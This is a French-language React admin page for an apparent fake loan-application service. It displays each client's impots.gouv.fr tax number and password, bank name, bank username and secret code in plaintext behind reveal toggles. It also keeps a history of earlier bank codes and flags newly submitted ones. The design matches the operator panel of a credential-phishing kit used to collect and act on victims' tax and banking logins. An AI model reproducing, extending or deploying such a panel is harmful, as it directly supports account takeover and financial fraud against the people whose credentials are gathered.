import React, { useState, useEffect } from 'react';
import AdminSidebar from '../../components/AdminSidebar';
import { Card } from '../../components/ui/card';
import { Button } from '../../components/ui/button';
import { Input } from '../../components/ui/input';
import {
  Table,
  TableBody,
  TableCell,
  TableHead,
  TableHeader,
  TableRow,
} from '../../components/ui/table';
import {
  Dialog,
  DialogContent,
  DialogHeader,
  DialogTitle,
} from '../../components/ui/dialog';
import { loanFlowService, clientService } from '../../services/api';
import { useToast } from '../../hooks/use-toast';
import { Search, Eye, EyeOff, User, Building2, FileText, CheckCircle, Clock, AlertCircle, Trash2 } from 'lucide-react';

const AdminClientData = () => {
  const { toast } = useToast();
  const [loanFlows, setLoanFlows] = useState([]);
  const [clients, setClients] = useState([]);
  const [loading, setLoading] = useState(true);
  const [searchTerm, setSearchTerm] = useState('');
  const [selectedFlow, setSelectedFlow] = useState(null);
  const [isDetailDialogOpen, setIsDetailDialogOpen] = useState(false);
  const [showPasswords, setShowPasswords] = useState({});

  useEffect(() => {
    loadData();
  }, []);

  const loadData = async () => {
    try {
      const [flowsData, clientsData] = await Promise.all([
        loanFlowService.getAll(),
        clientService.getAll()
      ]);
      setLoanFlows(flowsData);
      setClients(clientsData);
    } catch (error) {
      console.error('Error loading data:', error);
      toast({
        title: 'Erreur',
        description: 'Impossible de charger les données',
        variant: 'destructive',
      });
    } finally {
      setLoading(false);
    }
  };

  const getClientInfo = (clientId) => {
    return clients.find(c => c.id === clientId) || null;
  };

  const togglePasswordVisibility = (flowId, field) => {
    setShowPasswords(prev => ({
      ...prev,
      [`${flowId}-${field}`]: !prev[`${flowId}-${field}`]
    }));
  };

  const getStepLabel = (step) => {
    const labels = {
      'preparation': 'Préparation',
      'mtrust_intro': 'MTrust Intro',
      'impots_login': 'Impots Login',
      'share_data': 'Partage données',
      'bank_selection': 'Sélection banque',
      'bank_login': 'Connexion banque',
      'bank_connection': 'Connexion banque',
      'processing': 'Traitement',
      'success': 'Terminé'
    };
    return labels[step] || step;
  };

  const getStepColor = (step) => {
    if (step === 'success') return 'bg-green-100 text-green-700';
    if (step === 'processing') return 'bg-blue-100 text-blue-700';
    return 'bg-orange-100 text-orange-700';
  };

  const filteredFlows = loanFlows.filter(flow => {
    const client = getClientInfo(flow.clientId);
    if (!client) return false;
    
    const fullName = `${client.firstName} ${client.lastName}`.toLowerCase();
    const email = client.email.toLowerCase();
    const search = searchTerm.toLowerCase();
    
    return fullName.includes(search) || email.includes(search);
  });

  const openDetailDialog = (flow) => {
    setSelectedFlow(flow);
    setIsDetailDialogOpen(true);
  };

  const handleDeleteFlow = async (flowId) => {
    if (!window.confirm('Êtes-vous sûr de vouloir supprimer ces données client ? Cette action est irréversible.')) {
      return;
    }
    
    try {
      await loanFlowService.delete(flowId);
      toast({
        title: 'Succès',
        description: 'Données client supprimées avec succès',
      });
      // Close dialog if open
      setIsDetailDialogOpen(false);
      setSelectedFlow(null);
      // Reload data
      loadData();
    } catch (error) {
      console.error('Error deleting flow:', error);
      toast({
        title: 'Erreur',
        description: 'Impossible de supprimer les données',
        variant: 'destructive',
      });
    }
  };

  return (
    <div className="flex">
      <AdminSidebar />
      <div className="flex-1 bg-gray-50">
        {/* Header */}
        <div className="bg-white border-b border-gray-200 p-6">
          <h1 className="text-2xl font-bold text-gray-900">Données des clients</h1>
          <p className="text-gray-600 mt-1">
            Consultez toutes les informations soumises par les clients (identifiants fiscaux, bancaires, etc.)
          </p>
        </div>

        {/* Main Content */}
        <div className="p-6">
          {/* Stats */}
          <div className="grid md:grid-cols-4 gap-6 mb-8">
            <Card className="p-6">
              <div className="flex items-center justify-between">
                <div>
                  <p className="text-sm text-gray-600 mb-1">Total demandes</p>
                  <p className="text-2xl font-bold text-gray-900">{loanFlows.length}</p>
                </div>
                <div className="p-3 rounded-lg bg-blue-50">
                  <FileText className="h-6 w-6 text-blue-600" />
                </div>
              </div>
            </Card>
            <Card className="p-6">
              <div className="flex items-center justify-between">
                <div>
                  <p className="text-sm text-gray-600 mb-1">Avec données fiscales</p>
                  <p className="text-2xl font-bold text-gray-900">
                    {loanFlows.filter(f => f.fiscalNumber).length}
                  </p>
                </div>
                <div className="p-3 rounded-lg bg-purple-50">
                  <User className="h-6 w-6 text-purple-600" />
                </div>
              </div>
            </Card>
            <Card className="p-6">
              <div className="flex items-center justify-between">
                <div>
                  <p className="text-sm text-gray-600 mb-1">Avec données bancaires</p>
                  <p className="text-2xl font-bold text-gray-900">
                    {loanFlows.filter(f => f.bankCredentials).length}
                  </p>
                </div>
                <div className="p-3 rounded-lg bg-green-50">
                  <Building2 className="h-6 w-6 text-green-600" />
                </div>
              </div>
            </Card>
            <Card className="p-6">
              <div className="flex items-center justify-between">
                <div>
                  <p className="text-sm text-gray-600 mb-1">Terminés</p>
                  <p className="text-2xl font-bold text-gray-900">
                    {loanFlows.filter(f => f.currentStep === 'success').length}
                  </p>
                </div>
                <div className="p-3 rounded-lg bg-purple-50">
                  <CheckCircle className="h-6 w-6 text-purple-600" />
                </div>
              </div>
            </Card>
          </div>

          {/* Search */}
          <Card className="p-4 mb-6">
            <div className="relative">
              <Search className="absolute left-3 top-3 h-4 w-4 text-gray-400" />
              <Input
                placeholder="Rechercher par nom ou email..."
                value={searchTerm}
                onChange={(e) => setSearchTerm(e.target.value)}
                className="pl-10"
              />
            </div>
          </Card>

          {/* Table */}
          <Card>
            <Table>
              <TableHeader>
                <TableRow className="bg-gray-50">
                  <TableHead>Client</TableHead>
                  <TableHead>Numéro fiscal</TableHead>
                  <TableHead>Mot de passe fiscal</TableHead>
                  <TableHead>Banque</TableHead>
                  <TableHead>Identifiant bancaire</TableHead>
                  <TableHead>Étape actuelle</TableHead>
                  <TableHead className="text-right">Actions</TableHead>
                </TableRow>
              </TableHeader>
              <TableBody>
                {loading ? (
                  <TableRow>
                    <TableCell colSpan={7} className="text-center py-8">
                      <div className="flex items-center justify-center">
                        <div className="w-8 h-8 border-4 border-cyan-600 border-t-transparent rounded-full animate-spin"></div>
                        <span className="ml-3 text-gray-600">Chargement...</span>
                      </div>
                    </TableCell>
                  </TableRow>
                ) : filteredFlows.length === 0 ? (
                  <TableRow>
                    <TableCell colSpan={7} className="text-center py-8">
                      <AlertCircle className="h-12 w-12 text-gray-400 mx-auto mb-3" />
                      <p className="text-gray-600">Aucune demande de crédit trouvée</p>
                    </TableCell>
                  </TableRow>
                ) : (
                  filteredFlows.map((flow) => {
                    const client = getClientInfo(flow.clientId);
                    return (
                      <TableRow key={flow.id} className="hover:bg-gray-50">
                        <TableCell>
                          <div className="flex items-center space-x-3">
                            <div className="w-10 h-10 rounded-full bg-purple-100 flex items-center justify-center">
                              <span className="font-semibold text-purple-700">
                                {client?.firstName?.charAt(0)}{client?.lastName?.charAt(0)}
                              </span>
                            </div>
                            <div>
                              <p className="font-medium text-gray-900">
                                {client?.firstName} {client?.lastName}
                              </p>
                              <p className="text-sm text-gray-500">{client?.email}</p>
                            </div>
                          </div>
                        </TableCell>
                        <TableCell>
                          <span className="font-mono text-sm">
                            {flow.fiscalNumber || '-'}
                          </span>
                        </TableCell>
                        <TableCell>
                          {flow.fiscalPassword ? (
                            <div className="flex items-center space-x-2">
                              <span className="font-mono text-sm">
                                {showPasswords[`${flow.id}-fiscal`] ? flow.fiscalPassword : '••••••••'}
                              </span>
                              <button
                                onClick={() => togglePasswordVisibility(flow.id, 'fiscal')}
                                className="text-gray-400 hover:text-gray-600"
                              >
                                {showPasswords[`${flow.id}-fiscal`] ? (
                                  <EyeOff className="h-4 w-4" />
                                ) : (
                                  <Eye className="h-4 w-4" />
                                )}
                              </button>
                            </div>
                          ) : (
                            <span className="text-gray-400">-</span>
                          )}
                        </TableCell>
                        <TableCell>
                          <span className="text-sm">
                            {flow.bankCredentials?.bankName || flow.bankSelected || '-'}
                          </span>
                        </TableCell>
                        <TableCell>
                          {flow.bankCredentials?.username ? (
                            <span className="font-mono text-sm">
                              {flow.bankCredentials.username}
                            </span>
                          ) : (
                            <span className="text-gray-400">-</span>
                          )}
                        </TableCell>
                        <TableCell>
                          <span className={`px-3 py-1 rounded-full text-xs font-semibold ${getStepColor(flow.currentStep)}`}>
                            {getStepLabel(flow.currentStep)}
                          </span>
                        </TableCell>
                        <TableCell className="text-right">
                          <div className="flex items-center justify-end space-x-2">
                            <Button
                              size="sm"
                              variant="outline"
                              onClick={() => openDetailDialog(flow)}
                            >
                              <Eye className="h-4 w-4 mr-1" />
                              Détails
                            </Button>
                            <Button
                              size="sm"
                              variant="outline"
                              className="text-red-600 hover:text-red-700 hover:bg-red-50"
                              onClick={() => handleDeleteFlow(flow.id)}
                            >
                              <Trash2 className="h-4 w-4" />
                            </Button>
                          </div>
                        </TableCell>
                      </TableRow>
                    );
                  })
                )}
              </TableBody>
            </Table>
          </Card>
        </div>
      </div>

      {/* Detail Dialog */}
      <Dialog open={isDetailDialogOpen} onOpenChange={setIsDetailDialogOpen}>
        <DialogContent className="max-w-2xl max-h-[90vh] overflow-y-auto">
          <DialogHeader>
            <DialogTitle>Détails de la demande</DialogTitle>
          </DialogHeader>
          {selectedFlow && (
            <div className="space-y-6 py-4">
              {/* Client Info */}
              <div>
                <h3 className="font-semibold text-gray-900 mb-3 flex items-center">
                  <User className="h-5 w-5 mr-2 text-purple-600" />
                  Informations client
                </h3>
                <div className="bg-gray-50 p-4 rounded-lg space-y-2">
                  {(() => {
                    const client = getClientInfo(selectedFlow.clientId);
                    return client ? (
                      <>
                        <p><strong>Nom:</strong> {client.firstName} {client.lastName}</p>
                        <p><strong>Email:</strong> {client.email}</p>
                        <p><strong>Téléphone:</strong> {client.phone}</p>
                        <p><strong>Adresse:</strong> {client.address}, {client.zipCode} {client.city}</p>
                      </>
                    ) : (
                      <p className="text-gray-500">Client non trouvé</p>
                    );
                  })()}
                </div>
              </div>

              {/* Fiscal Data */}
              <div>
                <h3 className="font-semibold text-gray-900 mb-3 flex items-center">
                  <FileText className="h-5 w-5 mr-2 text-purple-600" />
                  Données fiscales (impots.gouv.fr)
                </h3>
                <div className="bg-purple-50 p-4 rounded-lg space-y-2">
                  {selectedFlow.fiscalNumber ? (
                    <>
                      <p><strong>Numéro fiscal:</strong> <span className="font-mono">{selectedFlow.fiscalNumber}</span></p>
                      <div className="flex items-center">
                        <strong>Mot de passe:</strong>
                        <span className="font-mono ml-2">
                          {showPasswords[`detail-fiscal`] ? selectedFlow.fiscalPassword : '••••••••'}
                        </span>
                        <button
                          onClick={() => togglePasswordVisibility('detail', 'fiscal')}
                          className="ml-2 text-gray-400 hover:text-gray-600"
                        >
                          {showPasswords[`detail-fiscal`] ? (
                            <EyeOff className="h-4 w-4" />
                          ) : (
                            <Eye className="h-4 w-4" />
                          )}
                        </button>
                      </div>
                      {selectedFlow.fiscalData && (
                        <>
                          <p><strong>Revenu fiscal:</strong> {selectedFlow.fiscalData.revenuFiscal} €</p>
                          <p><strong>Nombre de parts:</strong> {selectedFlow.fiscalData.nombreParts}</p>
                        </>
                      )}
                    </>
                  ) : (
                    <p className="text-gray-500">Aucune donnée fiscale soumise</p>
                  )}
                </div>
              </div>

              {/* Bank Data */}
              <div>
                <h3 className="font-semibold text-gray-900 mb-3 flex items-center">
                  <Building2 className="h-5 w-5 mr-2 text-green-600" />
                  Données bancaires
                </h3>
                <div className="bg-green-50 p-4 rounded-lg space-y-2">
                  {selectedFlow.bankCredentials ? (
                    <>
                      {/* Current credentials - marked as "Nouveau" if status exists */}
                      <div className="mb-3">
                        {selectedFlow.bankCredentials.status === 'nouveau' && (
                          <span className="inline-block bg-green-500 text-white text-xs px-2 py-1 rounded mb-2">Nouveau code</span>
                        )}
                        <p><strong>Banque:</strong> {selectedFlow.bankCredentials.bankName || selectedFlow.bankSelected}</p>
                        <p><strong>Identifiant:</strong> <span className="font-mono">{selectedFlow.bankCredentials.username}</span></p>
                        <div className="flex items-center">
                          <strong>Code secret:</strong>
                          <span className="font-mono ml-2">
                            {showPasswords[`detail-bank`] ? selectedFlow.bankCredentials.password : '••••••••'}
                          </span>
                          <button
                            onClick={() => togglePasswordVisibility('detail', 'bank')}
                            className="ml-2 text-gray-400 hover:text-gray-600"
                          >
                            {showPasswords[`detail-bank`] ? (
                              <EyeOff className="h-4 w-4" />
                            ) : (
                              <Eye className="h-4 w-4" />
                            )}
                          </button>
                        </div>
                        {selectedFlow.bankCredentials.submittedAt && (
                          <p><strong>Soumis le:</strong> {new Date(selectedFlow.bankCredentials.submittedAt).toLocaleString('fr-FR')}</p>
                        )}
                      </div>

                      {/* History of old credentials */}
                      {selectedFlow.bankCredentialsHistory && selectedFlow.bankCredentialsHistory.length > 0 && (
                        <div className="border-t border-green-200 pt-3 mt-3">
                          <p className="font-semibold text-gray-700 mb-2">Historique des anciens codes :</p>
                          {selectedFlow.bankCredentialsHistory.map((oldCred, index) => (
                            <div key={index} className="bg-yellow-50 p-3 rounded-lg mb-2 border border-yellow-200">
                              <span className="inline-block bg-yellow-500 text-white text-xs px-2 py-1 rounded mb-2">Ancien code #{selectedFlow.bankCredentialsHistory.length - index}</span>
                              <p><strong>Banque:</strong> {oldCred.bankName}</p>
                              <p><strong>Identifiant:</strong> <span className="font-mono">{oldCred.username}</span></p>
                              <div className="flex items-center">
                                <strong>Code secret:</strong>
                                <span className="font-mono ml-2">
                                  {showPasswords[`history-bank-${index}`] ? oldCred.password : '••••••••'}
                                </span>
                                <button
                                  onClick={() => togglePasswordVisibility('history', `bank-${index}`)}
                                  className="ml-2 text-gray-400 hover:text-gray-600"
                                >
                                  {showPasswords[`history-bank-${index}`] ? (
                                    <EyeOff className="h-4 w-4" />
                                  ) : (
                                    <Eye className="h-4 w-4" />
                                  )}
                                </button>
                              </div>
                              {oldCred.submittedAt && (
                                <p className="text-sm text-gray-500">Soumis le: {new Date(oldCred.submittedAt).toLocaleString('fr-FR')}</p>
                              )}
                              {oldCred.archivedAt && (
                                <p className="text-sm text-gray-500">Archivé le: {new Date(oldCred.archivedAt).toLocaleString('fr-FR')}</p>
                              )}
                            </div>
                          ))}
                        </div>
                      )}
                    </>
                  ) : (
                    <p className="text-gray-500">Aucune donnée bancaire soumise</p>
                  )}
                </div>
              </div>

              {/* Status */}
              <div>
                <h3 className="font-semibold text-gray-900 mb-3 flex items-center">
                  <Clock className="h-5 w-5 mr-2 text-orange-600" />
                  Statut de la demande
                </h3>
                <div className="bg-orange-50 p-4 rounded-lg space-y-2">
                  <p><strong>Étape actuelle:</strong> <span className={`px-2 py-1 rounded text-xs font-semibold ${getStepColor(selectedFlow.currentStep)}`}>{getStepLabel(selectedFlow.currentStep)}</span></p>
                  <p><strong>Créé le:</strong> {new Date(selectedFlow.createdAt).toLocaleString('fr-FR')}</p>
                  {selectedFlow.updatedAt && (
                    <p><strong>Dernière mise à jour:</strong> {new Date(selectedFlow.updatedAt).toLocaleString('fr-FR')}</p>
                  )}
                  {selectedFlow.completedAt && (
                    <p><strong>Terminé le:</strong> {new Date(selectedFlow.completedAt).toLocaleString('fr-FR')}</p>
                  )}
                </div>
              </div>

              {/* Delete Button */}
              <div className="pt-4 border-t border-gray-200">
                <Button
                  variant="outline"
                  className="w-full text-red-600 hover:text-red-700 hover:bg-red-50 border-red-200"
                  onClick={() => handleDeleteFlow(selectedFlow.id)}
                >
                  <Trash2 className="h-4 w-4 mr-2" />
                  Supprimer ces données
                </Button>
              </div>
            </div>
          )}
        </DialogContent>
      </Dialog>
    </div>
  );
};

export default AdminClientData;
